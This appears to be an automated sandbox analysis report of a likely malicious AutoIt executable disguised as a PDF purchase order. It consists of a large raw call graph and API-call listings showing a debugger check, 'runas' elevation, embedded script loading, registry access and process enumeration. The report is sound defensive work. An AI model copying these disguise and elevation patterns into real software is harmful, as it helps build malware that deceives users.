108789 c9d3d2 108659->108789 108661 cef3a9 108663 c9d89e 50 API calls 108661->108663 108662 cef389 Mailbox 108662->108661 108664 cef3cd 108662->108664 108665 cef3e1 108662->108665 108678 cef421 Mailbox 108663->108678 108800 c97e53 108664->108800 108666 c9c935 48 API calls 108665->108666 108668 cef3df 108666->108668 108669 cef429 108668->108669 108809 cecdb5 407 API calls 108668->108809 108794 cecd12 108669->108794 108671 cef410 108671->108669 108673 cef414 108671->108673 108810 cdd338 86 API calls 4 library calls 108673->108810 108674 cef44b 108676 cef457 108674->108676 108677 cef4a2 108674->108677 108676->108661 108680 cef476 108676->108680 108679 cef34f 407 API calls 108677->108679 108678->108287 108679->108678 108681 c9ca8e 48 API calls 108680->108681 108681->108678 108682->108235 108683->108266 108684->108266 108685->108289 108686->108266 108687->108236 108688->108289 108689->108289 108690->108250 108691->108285 108693 ca469f 108692->108693 108694 ca4537 108692->108694 108695 c9caee 48 API calls 108693->108695 108696 d07820 108694->108696 108697 ca4543 108694->108697 108704 ca45e4 Mailbox 108695->108704 109025 cee713 407 API calls Mailbox 108696->109025 108887 ca4040 108697->108887 108700 ca4639 Mailbox 108700->108287 108701 d0782c 108701->108700 109026 cdd520 86 API calls 4 library calls 108701->109026 108703 ca4559 108703->108700 108703->108701 108703->108704 108902 ce95af WSAStartup 108704->108902 108904 c950ec 108704->108904 108908 cf352a 108704->108908 108996 ce6fc3 108704->108996 108999 ce1080 108704->108999 109002 cddce9 108704->109002 109007 ce9500 108704->109007 109016 caf55e 108704->109016 108713->108277 108714->108284 108715->108290 109559 c9a9a0 108716->109559 108718 ca36e7 108719 ca3778 108718->108719 108720 d0a269 108718->108720 108784 ca3aa8 108718->108784 109571 cabc04 86 API calls 108719->109571 109576 cdd520 86 API calls 4 library calls 108720->109576 108724 d0a68d 108724->108784 109591 cdd520 86 API calls 4 library calls 108724->109591 108726 
cabc5c 48 API calls 108739 ca396b Mailbox _memmove 108726->108739 108727 ca3793 108727->108724 108727->108739 108727->108784 109564 c910e8 108727->109564 108731 d0a583 108735 c9fa40 407 API calls 108731->108735 108732 d0a45c 109585 cdd520 86 API calls 4 library calls 108732->109585 108733 d0a289 108736 c9d2d2 53 API calls 108733->108736 108775 d0a3e9 108733->108775 108734 ca384e 108734->108739 108745 d0a60c 108734->108745 108746 ca38e5 108734->108746 108738 d0a5b5 108735->108738 108740 d0a2fb 108736->108740 108748 c9d380 55 API calls 108738->108748 108738->108784 108739->108726 108739->108731 108739->108732 108739->108733 108752 d0a5e6 108739->108752 108753 c9fa40 407 API calls 108739->108753 108764 c9d89e 50 API calls 108739->108764 108772 cb010a 48 API calls 108739->108772 108774 ca399f 108739->108774 108739->108784 109572 c9d500 53 API calls __cinit 108739->109572 109573 c9d420 53 API calls 108739->109573 109574 cabaef 48 API calls _memmove 108739->109574 109586 ced21a 82 API calls Mailbox 108739->109586 109587 cd89e0 53 API calls 108739->109587 109588 c9d772 55 API calls 108739->109588 108742 d0a303 108740->108742 108743 d0a40f 108740->108743 108756 d0a317 108742->108756 108757 d0a341 108742->108757 109582 cacf79 49 API calls 108743->109582 109590 cdd231 50 API calls 108745->109590 108751 cb010a 48 API calls 108746->108751 108748->108752 109589 cdd520 86 API calls 4 library calls 108752->109589 108753->108739 108755 d0a42c 108758 d0a441 108755->108758 108759 d0a44d 108755->108759 109577 cdd520 86 API calls 4 library calls 108756->109577 108765 d0a366 108757->108765 108768 d0a384 108757->108768 108764->108739 109578 cef211 407 API calls 108765->109578 108769 d0a37a 108768->108769 109579 cef4df 407 API calls 108768->109579 108769->108784 108772->108739 108776 c9c935 48 API calls 108774->108776 108777 ca39c0 108774->108777 109581 cdd520 86 API calls 4 library calls 108775->109581 108776->108777 108779 d0a65e 108777->108779 108781 ca3a05 108777->108781 
108777->108784 108780 c9d89e 50 API calls 108779->108780 108780->108724 108781->108724 108782 ca3a95 108781->108782 108781->108784 108783 c9d89e 50 API calls 108782->108783 108783->108784 108785 ca3ab5 Mailbox 108784->108785 109575 cdd520 86 API calls 4 library calls 108784->109575 108785->108287 108786->108287 108787->108259 108788->108264 108790 cb010a 48 API calls 108789->108790 108791 c9d3f3 108790->108791 108792 cb010a 48 API calls 108791->108792 108793 c9d401 108792->108793 108793->108662 108795 cecd46 108794->108795 108796 cecd21 108794->108796 108795->108674 108797 c9ca8e 48 API calls 108796->108797 108798 cecd2d 108797->108798 108811 cec8b7 108798->108811 108801 c97ecf 108800->108801 108804 c97e5f __wsetenvp 108800->108804 108879 c9a2fb 108801->108879 108803 c97e85 _memmove 108803->108668 108805 c97e7b 108804->108805 108806 c97ec7 108804->108806 108875 c9a6f8 108805->108875 108878 c97eda 48 API calls 108806->108878 108809->108671 108810->108678 108813 cec914 108811->108813 108814 cec8f7 108811->108814 108869 cec235 407 API calls Mailbox 108813->108869 108814->108813 108815 cecc61 108814->108815 108816 cec934 108814->108816 108817 cecc6e 108815->108817 108818 cecca9 108815->108818 108816->108813 108847 ccabf3 108816->108847 108865 cad6b4 48 API calls 108817->108865 108818->108813 108823 ceccb6 108818->108823 108820 cec964 108820->108813 108824 cec973 108820->108824 108822 cecc87 108866 cd97b6 89 API calls 108822->108866 108867 cad6b4 48 API calls 108823->108867 108833 cec9a1 108824->108833 108851 cca8c8 108824->108851 108828 ceccd6 108868 cd503c 91 API calls Mailbox 108828->108868 108830 cecadc VariantInit 108837 cecb11 _memset 108830->108837 108834 ceca4a 108833->108834 108861 cca25b 106 API calls 108833->108861 108834->108830 108835 ceca86 VariantClear 108834->108835 108835->108834 108836 cecaa5 SysAllocString 108835->108836 108836->108834 108844 cecc52 108844->108795 108848 ccac04 __wsetenvp 108847->108848 108850 ccac16 108847->108850 108848->108850 
108870 c93bcf 108848->108870 108850->108820 108853 cca8f2 108851->108853 108852 cca90a 108852->108833 108853->108852 108854 cca9ed SysFreeString 108853->108854 108855 ccaa7e 108853->108855 108856 cca9f9 108853->108856 108854->108856 108855->108852 108855->108856 108856->108852 108861->108833 108865->108822 108866->108844 108867->108828 108868->108844 108869->108844 108871 c93bd9 __wsetenvp 108870->108871 108872 cb010a 48 API calls 108871->108872 108873 c93bee _wcscpy 108872->108873 108873->108850 108876 cb010a 48 API calls 108875->108876 108877 c9a702 108876->108877 108877->108803 108878->108803 108880 c9a309 108879->108880 108882 c9a321 _memmove 108879->108882 108880->108882 108883 c9b8a7 108880->108883 108882->108803 108884 c9b8ba 108883->108884 108886 c9b8b7 _memmove 108883->108886 108885 cb010a 48 API calls 108884->108885 108885->108886 108886->108882 108888 d0787b 108887->108888 108891 ca406c 108887->108891 109028 cdd520 86 API calls 4 library calls 108888->109028 108890 d0788c 109029 cdd520 86 API calls 4 library calls 108890->109029 108891->108890 108898 ca40a6 _memmove 108891->108898 108893 ca4175 108899 ca4185 108893->108899 109027 ced21a 82 API calls Mailbox 108893->109027 108895 cb010a 48 API calls 108895->108898 108896 ca41f1 108896->108703 108897 c9fa40 407 API calls 108897->108898 108898->108893 108898->108895 108898->108897 108898->108899 108900 d078d8 108898->108900 108899->108703 109030 cdd520 86 API calls 4 library calls 108900->109030 108903 ce95e0 108902->108903 108903->108700 108905 c95105 108904->108905 108906 c950f6 108904->108906 108905->108906 108907 c9510a CloseHandle 108905->108907 108906->108700 108907->108906 108909 c9d3d2 48 API calls 108908->108909 108910 cf354a 108909->108910 108911 c9d3d2 48 API calls 108910->108911 108912 cf3553 108911->108912 108913 c9d3d2 48 API calls 108912->108913 108914 cf355c 108913->108914 108915 c984a6 81 API calls 108914->108915 108923 cf35e9 Mailbox 108914->108923 108916 cf3580 108915->108916 109031 
API calls 111474->111505 111506 cee713 407 API calls Mailbox 111474->111506 111475->111474 111476->111474 111477->111474 111478->111474 111479->111474 111480->111474 111481->111474 111482->111474 111483->111474 111484->111474 111485->111474 111486->111474 111487->111474 111488->111474 111489->111474 111490->111474 111491->111474 111492->111474 111494 cae022 111493->111494 111495 cae034 111493->111495 111496 c9d89e 50 API calls 111494->111496 111497 cae03a 111495->111497 111498 cae063 111495->111498 111501 cae02c 111496->111501 111500 cb010a 48 API calls 111497->111500 111499 c9d89e 50 API calls 111498->111499 111499->111501 111500->111501 111501->111430 111502->111474 111503->111474 111504->111474 111505->111474 111506->111474 111507->111436 111508->111439 111509->111473 111510->111466 111511->111437 111512->111444 111513->111441 111514->111448 111515->111458 111516 ca13d9 111517 cb010a 48 API calls 111516->111517 111518 ca13e0 111517->111518 111519 d0bc25 111520 d0bc27 111519->111520 111523 cd79f8 SHGetFolderPathW 111520->111523 111522 d0bc30 111522->111522 111524 c97e53 48 API calls 111523->111524 111525 cd7a25 111524->111525 111525->111522 111526 d0c146 GetUserNameW 111527 d01eca 111532 cabe17 111527->111532 111531 d01ed9 111533 c9d3d2 48 API calls 111532->111533 111534 cabe85 111533->111534 111541 cac929 111534->111541 111536 d0db92 111538 cabf22 111538->111536 111539 cabf3e 111538->111539 111544 cac8b7 48 API calls _memmove 111538->111544 111540 cb1b2a 52 API calls __cinit 111539->111540 111540->111531 111545 cac955 111541->111545 111544->111538 111546 cac962 111545->111546 111548 cac948 111545->111548 111547 cac969 RegOpenKeyExW 111546->111547 111546->111548 111547->111548 111549 cac983 RegQueryValueExW 111547->111549 111548->111538 111550 cac9b9 RegCloseKey 111549->111550 111551 cac9a4 111549->111551 111550->111548 111551->111550 111552 d01e8b 111557 cae44f 111552->111557 111556 d01e9a 111558 cb010a 48 API calls 111557->111558 111559 cae457 111558->111559 
111560 cae46b 111559->111560 111565 cae74b 111559->111565 111564 cb1b2a 52 API calls __cinit 111560->111564 111564->111556 111566 cae463 111565->111566 111567 cae754 111565->111567 111569 cae47b 111566->111569 111597 cb1b2a 52 API calls __cinit 111567->111597 111570 c9d3d2 48 API calls 111569->111570 111571 cae492 GetVersionExW 111570->111571 111572 c97e53 48 API calls 111571->111572 111573 cae4d5 111572->111573 111598 cae5f8 111573->111598 111576 cae617 48 API calls 111577 cae4e9 111576->111577 111579 d029f9 111577->111579 111602 cae6d1 111577->111602 111581 cae55f GetCurrentProcess 111611 cae70e LoadLibraryA GetProcAddress 111581->111611 111583 cae59e 111605 cae694 111583->111605 111584 cae5ec GetSystemInfo 111586 cae5c9 111584->111586 111585 cae576 111585->111583 111585->111584 111588 cae5dc 111586->111588 111589 cae5d7 FreeLibrary 111586->111589 111588->111560 111589->111588 111591 cae5e4 GetSystemInfo 111593 cae5be 111591->111593 111592 cae5b4 111608 cae437 111592->111608 111593->111586 111596 cae5c4 FreeLibrary 111593->111596 111596->111586 111597->111566 111599 cae601 111598->111599 111600 c9a2fb 48 API calls 111599->111600 111601 cae4dd 111600->111601 111601->111576 111612 cae6e3 111602->111612 111616 cae6a6 111605->111616 111609 cae694 2 API calls 111608->111609 111610 cae43f GetNativeSystemInfo 111609->111610 111610->111593 111611->111585 111613 cae55b 111612->111613 111614 cae6ec LoadLibraryA 111612->111614 111613->111581 111613->111585 111614->111613 111615 cae6fd GetProcAddress 111614->111615 111615->111613 111617 cae5ac 111616->111617 111618 cae6af LoadLibraryA 111616->111618 111617->111591 111617->111592 111618->111617 111619 cae6c0 GetProcAddress 111618->111619 111619->111617 111620 d01eed 111625 cae975 111620->111625 111622 d01f01 111641 cb1b2a 52 API calls __cinit 111622->111641 111624 d01f0b 111626 cb010a 48 API calls 111625->111626 111627 caea27 GetModuleFileNameW 111626->111627 111628 cb297d __wsplitpath 47 API calls 111627->111628 111629 
caea5b _wcsncat 111628->111629 111642 cb2bff 111629->111642 111632 cb010a 48 API calls 111633 caea94 _wcscpy 111632->111633 111634 c9d3d2 48 API calls 111633->111634 111635 caeacf 111634->111635 111645 caeb05 111635->111645 111637 caeae0 Mailbox 111637->111622 111638 cb010a 48 API calls 111639 caeada _wcscat __wsetenvp _wcsncpy 111638->111639 111639->111637 111639->111638 111640 c9a4f6 48 API calls 111639->111640 111640->111639 111641->111624 111659 cbaab9 111642->111659 111646 c9c4cd 48 API calls 111645->111646 111647 caeb14 RegOpenKeyExW 111646->111647 111648 d04b17 RegQueryValueExW 111647->111648 111649 caeb35 111647->111649 111650 d04b30 111648->111650 111651 d04b91 RegCloseKey 111648->111651 111649->111639 111652 cb010a 48 API calls 111650->111652 111653 d04b49 111652->111653 111654 c94bce 48 API calls 111653->111654 111655 d04b53 RegQueryValueExW 111654->111655 111656 d04b86 111655->111656 111657 d04b6f 111655->111657 111656->111651 111658 c97e53 48 API calls 111657->111658 111658->111656 111660 cbaaca 111659->111660 111661 cbabc6 111659->111661 111660->111661 111662 cbaad5 111660->111662 111669 cb889e 47 API calls __getptd_noexit 111661->111669 111666 caea8a 111662->111666 111668 cb889e 47 API calls __getptd_noexit 111662->111668 111666->111632 111667 cbabbb 111670 cb7aa0 8 API calls __Wcsftime_l 111667->111670 111668->111667 111669->111667 111670->111666 111671 c9e834 111672 ca2b40 407 API calls 111671->111672 111673 c9e840 111672->111673 111674 ca0ff7 111675 cae016 50 API calls 111674->111675 111676 ca100d 111675->111676 111731 cae08f 111676->111731 111680 cb010a 48 API calls 111712 c9fad8 Mailbox _memmove 111680->111712 111681 ca105e 111691 c9c935 48 API calls 111681->111691 111683 ca1063 111751 cdd520 86 API calls 4 library calls 111683->111751 111684 c9c935 48 API calls 111684->111712 111686 ca0dee 111687 c9d89e 50 API calls 111686->111687 111690 ca0dfa 111687->111690 111688 d0b772 111753 cdd520 86 API calls 4 library calls 111688->111753 111689 ca0119 
111752 cdd520 86 API calls 4 library calls 111689->111752 111692 c9d89e 50 API calls 111690->111692 111705 c9fbf1 Mailbox 111691->111705 111695 ca0e83 111692->111695 111693 c9f6d0 407 API calls 111693->111712 111694 c9d3d2 48 API calls 111694->111712 111700 c9caee 48 API calls 111695->111700 111696 cca599 InterlockedDecrement 111696->111712 111698 cb1b2a 52 API calls __cinit 111698->111712 111699 d0b7d2 111711 ca10f1 Mailbox 111700->111711 111703 ca103d 111703->111705 111750 cdd520 86 API calls 4 library calls 111703->111750 111706 c9fa40 407 API calls 111706->111712 111709 d0b583 111748 cdd520 86 API calls 4 library calls 111709->111748 111749 cdd520 86 API calls 4 library calls 111711->111749 111712->111680 111712->111681 111712->111683 111712->111684 111712->111686 111712->111688 111712->111689 111712->111690 111712->111693 111712->111694 111712->111695 111712->111696 111712->111698 111712->111703 111712->111705 111712->111706 111712->111709 111712->111711 111713 cf804e 113 API calls 111712->111713 111714 cf30ad 93 API calls 111712->111714 111715 cf798d 109 API calls 111712->111715 111716 ceb74b 407 API calls 111712->111716 111717 cf17aa 87 API calls 111712->111717 111718 caef0d 94 API calls 111712->111718 111719 cf10e5 82 API calls 111712->111719 111720 c950a3 49 API calls 111712->111720 111721 caf461 98 API calls 111712->111721 111722 ce8065 55 API calls 111712->111722 111723 ce9122 91 API calls 111712->111723 111724 cadd84 3 API calls 111712->111724 111725 ce92c0 88 API calls 111712->111725 111726 c981c6 85 API calls 111712->111726 111727 ce013f 87 API calls 111712->111727 111728 caf03e 2 API calls 111712->111728 111729 cf0bfa 129 API calls 111712->111729 111730 cf1f19 132 API calls 111712->111730 111743 ca1620 59 API calls Mailbox 111712->111743 111744 ceee52 82 API calls 2 library calls 111712->111744 111745 ceef9d 90 API calls Mailbox 111712->111745 111746 cdb020 48 API calls 111712->111746 111747 cee713 407 API calls Mailbox 111712->111747 111713->111712 
111714->111712 111715->111712 111716->111712 111717->111712 111718->111712 111719->111712 111720->111712 111721->111712 111722->111712 111723->111712 111724->111712 111725->111712 111726->111712 111727->111712 111728->111712 111729->111712 111730->111712 111732 c97b6e 48 API calls 111731->111732 111733 cae0b4 _wcscmp 111732->111733 111734 c9caee 48 API calls 111733->111734 111735 cae0e2 Mailbox 111733->111735 111736 d0b9c7 111734->111736 111735->111712 111754 c97b4b 48 API calls Mailbox 111736->111754 111738 d0b9d5 111739 c9d2d2 53 API calls 111738->111739 111740 d0b9e7 111739->111740 111741 c9d89e 50 API calls 111740->111741 111742 d0b9ec Mailbox 111740->111742 111741->111742 111742->111712 111743->111712 111744->111712 111745->111712 111746->111712 111747->111712 111748->111711 111749->111705 111750->111683 111751->111689 111752->111688 111753->111699 111754->111738

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C9376D
                            • Part of subcall function 00C94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00000000,00000001,00000000), ref: 00C9428C
                          • IsDebuggerPresent.KERNEL32(?,?), ref: 00C9377F
                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00D51120,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00D51124,?,?), ref: 00C937EE
                            • Part of subcall function 00C934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C9352A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C93860
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00D42934,00000010), ref: 00D021C5
                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00D021FD
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00D02232
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D2DAA4), ref: 00D02290
                          • ShellExecuteW.SHELL32(00000000), ref: 00D02297
                            • Part of subcall function 00C930A5: GetSysColorBrush.USER32(0000000F), ref: 00C930B0
                            • Part of subcall function 00C930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00C930BF
                            • Part of subcall function 00C930A5: LoadIconW.USER32(00000063), ref: 00C930D5
                            • Part of subcall function 00C930A5: LoadIconW.USER32(000000A4), ref: 00C930E7
                            • Part of subcall function 00C930A5: LoadIconW.USER32(000000A2), ref: 00C930F9
                            • Part of subcall function 00C930A5: RegisterClassExW.USER32(?), ref: 00C93167
                            • Part of subcall function 00C92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C92ECB
                            • Part of subcall function 00C92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C92EEC
                            • Part of subcall function 00C92E9D: ShowWindow.USER32(00000000), ref: 00C92F00
                            • Part of subcall function 00C92E9D: ShowWindow.USER32(00000000), ref: 00C92F09
                            • Part of subcall function 00C93598: _memset.LIBCMT ref: 00C935BE
                            • Part of subcall function 00C93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C93667
                          Strings
                          • runas, xrefs: 00D0228B
                          • C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, xrefs: 00C937B4, 00C937E9, 00C937FD, 00D02257
                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00D021BE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 4253510256-517146631
                          • Opcode ID: 7333da013f0863c16ae40b28c087e23a26d27fda512056de7aa680fd4edef7b6
                          • Instruction ID: b082c0ccad3764da5efc34dbd1f2a5e68294febb400a6a11d45c38db966b3c6d
                          • Opcode Fuzzy Hash: 7333da013f0863c16ae40b28c087e23a26d27fda512056de7aa680fd4edef7b6
                          • Instruction Fuzzy Hash: BD51F278644384BFCF10ABA09C4EFBD3B699B15715F000096FA51D22D1CB608A49DB36

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF317F
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00CF321E
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF32B6
                          • RegCloseKey.KERNEL32(000000FE,000000FE,00000000,?,00000000), ref: 00CF34F5
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3502
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: afd945ac6fc6ec7cc033373fa7072eac623cb74ea3e42cc32b651cdfd7bb03c8
                          • Instruction ID: 75206701b4ade375ddc2fd0462e9ec70f5fb732e3a0f3619e12e3c7e3bc5c569
                          • Opcode Fuzzy Hash: afd945ac6fc6ec7cc033373fa7072eac623cb74ea3e42cc32b651cdfd7bb03c8
                          • Instruction Fuzzy Hash: D1E19D31204205AFCB15DF29C894E6ABBF9EF89310F04856DF55ADB2A1DB30EE05DB52

                          Control-flow Graph

                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00C92A33
                          • KillTimer.USER32(?,00000001), ref: 00C92A5D
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C92A80
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92A8B
                          • CreatePopupMenu.USER32 ref: 00C92A9F
                          • PostQuitMessage.USER32(00000000), ref: 00C92AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303
                          • Opcode ID: fc777f723e47f8ce6c58ebbfbe9d72b24bc966b97177af57176c318b3cd00225
                          • Instruction ID: 7fb49edef1761ccbed139cc9cb2d1824fbfb64bb1378e24fd04be5d7fe7d0655
                          • Opcode Fuzzy Hash: fc777f723e47f8ce6c58ebbfbe9d72b24bc966b97177af57176c318b3cd00225
                          • Instruction Fuzzy Hash: 9841113220038ABBDF34AF689C0DBBA365AE714341F044219FD86D62E1DF749D40A775
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00CAE4A7
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • GetCurrentProcess.KERNEL32(00000000,00D2DC28,?,?), ref: 00CAE567
                          • GetNativeSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5BC
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CAE5C7
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CAE5DA
                          • GetSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5E4
                          • GetSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5F0
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                          • String ID:
                          • API String ID: 2717633055-0
                          • Opcode ID: fff44c07cc1d8ef1e01fde85bc5f742b4c84bab44ffd6b58284c1a45ffb52b81
                          • Instruction ID: cb9d1738eab1036bcf710be9e6588e1174c4298ca18ecaede83b9679c9939e40
                          • Opcode Fuzzy Hash: fff44c07cc1d8ef1e01fde85bc5f742b4c84bab44ffd6b58284c1a45ffb52b81
                          • Instruction Fuzzy Hash: 4061E2B1C0A385DFCF15CF68A8C51E97FB56F2A308F2845D9D8489B247D624CA09CFA5
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C93202
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00C93219
                          • LoadResource.KERNEL32(?,00000000), ref: 00D057D7
                          • SizeofResource.KERNEL32(?,00000000), ref: 00D057EC
                          • LockResource.KERNEL32(?), ref: 00D057FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: a8f1f2df11ad0e8a35f0339b0added8cb7d914f7424b6d41724659fff0423dcf
                          • Instruction ID: 7c1676382473f867a000264f33521c44a5e097ed10668bb81c901fe5463ec1c7
                          • Opcode Fuzzy Hash: a8f1f2df11ad0e8a35f0339b0added8cb7d914f7424b6d41724659fff0423dcf
                          • Instruction Fuzzy Hash: BC117970200B41BFEB258B65EC48F677BBAEBC9B41F208028F422D6290DB71DD01CA71
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6F7D
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6F8D
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CD6FAC
                          • __wsplitpath.LIBCMT ref: 00CD6FD0
                          • _wcscat.LIBCMT ref: 00CD6FE3
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD7022
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 2600fb59a060345d9d63aa782b10a2fd7de4a8431986894425e482210acbeb75
                          • Instruction ID: b2d57095f6b99ce4befa8b69aa7cc6508ab8a755319c9b803bc72fb0aaddb2dc
